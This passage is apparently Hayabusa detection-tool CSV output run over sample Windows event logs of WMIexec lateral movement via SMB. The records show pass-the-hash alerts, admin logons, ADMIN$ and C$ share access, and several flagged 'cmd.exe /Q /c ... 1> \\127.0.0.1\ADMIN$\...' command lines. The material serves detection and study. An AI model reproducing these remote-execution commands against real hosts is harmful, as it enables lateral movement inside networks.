Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.468 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: 
admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.530 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> 
\\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 
0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP 
Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.306 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | 
LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 
